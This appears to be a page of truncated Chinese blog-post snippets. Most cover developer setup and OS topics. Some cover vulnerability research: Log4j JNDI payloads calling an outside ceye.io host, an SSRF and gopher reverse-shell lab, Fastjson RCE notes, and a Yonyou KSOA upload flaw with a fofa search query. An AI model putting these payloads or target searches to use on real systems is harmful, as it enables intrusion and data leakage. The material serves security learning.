漏洞fastjson版本 环境

补环境框架笔记 1.浏览器环境下一些特殊的变量 window self window top window.self self.top.window document.all 能得到HTMLAllCollection对象 typeof document.all 却是 undefined 2.fidd ......

1.0 什么是sql注入 sql注入第一次是在1998年著名黑客杂志phack第54期上提出的 sql注入是服务器端未严格校验客户端发送的数据，导致服务器端sql语句被恶意修改并成功执行 的行为 1.1 sql的分类 sql注入按请求方法分为get型和post型。 按照sq;数据类型分类可分为整型注 ......

windows下node多版本安装 与conda安装python版本一样 这里用 nvm 链接：https://github.com/coreybutler/nvm-windows/releases 光速安装即可 选择nvm跟nodejs位置 查看版本命令 安装版本 常用命令 nvm ls nvm ......

一、进程的基本概念 1、进程与程序 程序是存储在磁盘上的可执行文件，程序被加载到内存中开始运行称为进程，一个程序可以同时加载成多个进程，进程就是处于活动状态下的程序 2、进程的分类 进程根据功能不同一般分为三种类型：交互进程、批处理进程、守护进程 交互进程：由一个shell终端启动的进程，在运行过程 ......

在 SAP Commerce Cloud 本地安装文档里，提到了 HSQLDB: HSQLDB（Hypersonic SQL Database）是一个开源的关系型数据库管理系统（RDBMS），它完全用Java编写，支持SQL标准，并提供了高性能和嵌入式数据库的功能。HSQLDB具有轻量级、快速、易于 ......

首先要说明一下：不管VS(Visual Studio)的版本是什么，也不管OpenCV的版本是什么，配置都大同小异。所以如果您希望在Window下配置OpenCV的开发环境，那么仔细阅读学习这篇文章即可。之前在介绍OpenCV的组件模块时，我是以OpenCV4来说明的，详情见链接 https://w ......

一、什么是虚拟环境 Python 应用经常需要使用一些包第三方包或者模块，有时需要依赖特定的包或者库的版本，所以很难有一个能适应所有 Python 应用的软件环境。甚至有的时候 Python 应用所依赖的版本是冲突的，满足了其中一个，另一个则无法运行，解决这一问题的方法是 虚拟环境。虚拟环境是一个包 ......

今天在centOS系统宝塔面板下创建Go项目，打算安装Go环境。 Gin、Gorm中的一些新语言特性似乎要求go1.18及以上，因此我安装并记录下了以下配置过程。 卸载原有旧版本（没有则不做） sudo rm -rf /usr/local/go 下载go对应版本二进制包 wget https://s ......

安装镜像 首先，在windows命令行安装指定版本的redis镜像： docker pull <image_name>:<version> 除此之外，因为 docker 安装运行 redis容器，是没有配置文件的，需要自己手动创建一个 redis.conf 文件。redis.conf文件的获取最好从 ......

https://www.jdon.com/58800.html 我们创建了一个无服务器的虚拟 Linux 环境，在浏览器中运行未经修改的 Debian 二进制文件。这由 WebAssembly 虚拟化平台 CheerpX 提供支持。WebAssembly 为浏览器世界带来了真正的创新，以及视角和责任 ......

作为 Qt 下载教程，本文会同时讲解以上三种下载方式。 Qt 官方下载（非常慢） Qt 官网有一个专门的资源下载网站，所有的开发环境和相关工具都可以从这里下载，具体地址是：http://download.qt.io/ Qt官方下载网站截图图1：Qt 官方下载网站截图 对目录结构的说明 archive ......

一、基本概念 1、中断 当进程接收到消息后中止当前正在进行进程，转而去执行其它任务，等其它任务执行结束后再返回刚刚中止的位置，可以继续往下运行，这种执行模式称为中断 中断分为硬件中断、软件中断，硬件中断是由硬件设备引发的、软件中断是执行了中断指令引发 2、信号 信号是一种软件中断，由操作系统发出，进 ......

一、内存管理 用户层 STL 智能指针/容器 自动分配、释放 调用C++ C++ new/delete 调用C C malloc/free 调用POSIX\Linux POSIX brk/sbrk 调用内核 Linux mmap/munmap 调用内核 系统层 Kernal kmalloc/vmal ......

一、一切皆文件 Linux/UNIX操作系统把所有的服务、设备、协议都抽象成文件的形式，提供了一套统一而简单的文件IO的系统调用，简称系统的文件IO 也就是说在UNIX\Linux中任何对象都可以被当做是某种特殊的文件，都可以像访问文件一样，访问这些对象 通过ls -l命令可以查看文件属性信息，其中 ......

看boss有招大数据的讲师，好奇看了下，现在大学都讲大数据了，现在是越来越普及。昨天弄了一个云服务器部署了下Hadoop，虽然也是参考网上教程部署，但过程中还是出了不少问题。想着把部署过程完整记录下，所以我就把部署好的实例释放了又实例化了一台新的云服务器重新部署了下，如果是在我本地安装报错了还得重新 ......

1. Appium介绍 Appium 是一个移动 App （手机应用）自动化工具。 手机APP 自动化有什么用？ *自动化完成一些重复性的任务：比如微信客服机器人 *爬虫：就是通过手机自动化爬取信息；为什么不通过网页、HTTP 爬取呢？有的系统没有网页，也不方便通过HTTP爬取 *自动化测试：很多企 ......

搭建内网学习所需要的内网环境(详细) 前言 建议内存加为24G或32G windows2012R2 192.168.1.1(域控制器) 密码 windows2012 其他计算机登录域 HACKER\testuser Admin@123 其他计算机加入域 Administrator windows20 ......

本文介绍在Anaconda环境下，创建、使用与删除Python虚拟环境的方法。 在Python的使用过程中，我们常常由于不同Python版本以及不同第三方库版本的支持情况与相互之间的冲突情况，而需要创建不同的Python虚拟环境；在Anaconda的帮助下，这一步骤就变得十分方便。 首先，我们需要打 ......

一、库： 库文件是目标文件的集合，可以被其他代码调用，把代码封装成库文件后方便使用、方便管理，安全性高、保密性强 静态库： 就是目标文件的集合，当调用静态库时，编译器会把静态库的所有的二进制指令拷贝到最后的可执行文件中 优点： 运行速度比共享库要快，运行时不需要依赖静态库文件。（它把通用功能模块的多 ......

### 编译安装 PHP 7.1.0 下载 7.1.0 源码压缩包：[www.php.net/releases/](http://www.php.net/releases/) `./configure --prefix=/Users/lisong/Documents/workspace/php-sr ......

# SSRF漏洞拓展 [TOC] ## curl_exec函数 ### 一、ssrf配合gopher协议反弹shell 实验环境： ``` （1）192.168.142.201 #redis服务器 （2）192.168.142.133 #攻击机 （3）192.168.142.1 #SSRF靶机 `` ......

1、 (base) C:\Users\Administrator> (base) C:\Users\Administrator> (base) C:\Users\Administrator>conda create -n wind_2023 python==3.7 Collecting packag ......

如果不需要在A语言下获取B语言的时区列表，可以使用C#自带的 var systemZones = TimeZoneInfo.GetSystemTimeZones(); 如果需要在A语言下获取B语言的时区列表，尝试过设置当前进程，线程的Culture是没办法实现的 var cultureInfo = ......

更新一下笔记中JAVA的几个知名的反序列化漏洞，仅漏洞poc和原理，无分析过程。 # Log4j 条件：出网（因为需要请求jndi服务器） ``` ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a. ......

[toc] # Fastjson_1.2.47_rce | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | Fastjson_1.2.47_远程执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 | | ### 1.1、漏洞描述 Fa ......

[toc] # fastjson 1.2.24 反序列化导致任意命令执行漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | fastjson 1.2.24 反序列化导致任意命令执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 ......

[toc] # IIS_7.o/7.5解析漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | IIS_7.o/7.5解析漏洞 | | 漏洞评级 | | | 影响范围 | win7,server2008 | | 漏洞描述 | | | 修复方案 | | ### 1.1、漏洞 ......

linux下安装vscode后需要安装几个插件  ![](https://img2023.cnblogs.com/bl ......

## 漏洞简介 用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限 ## 影响版本 用友时空企业信息融通平台KSOA v9.0 ## 漏洞复现 fofa语法：`app="用友-时空KSOA"` 登录页面如下： ![](https://img2023.c ......

# 如何安装node ### 1.查看node是否安装 ```markdown # 控制台(cmd窗口)输入以下命令(小写的v) node -v # 如果显示版本号，则表示已经安装的node。 # 如果没显示版本号，则安装下面步骤操作。 ``` ### 2.先去node官网下载安装包 node官网链 ......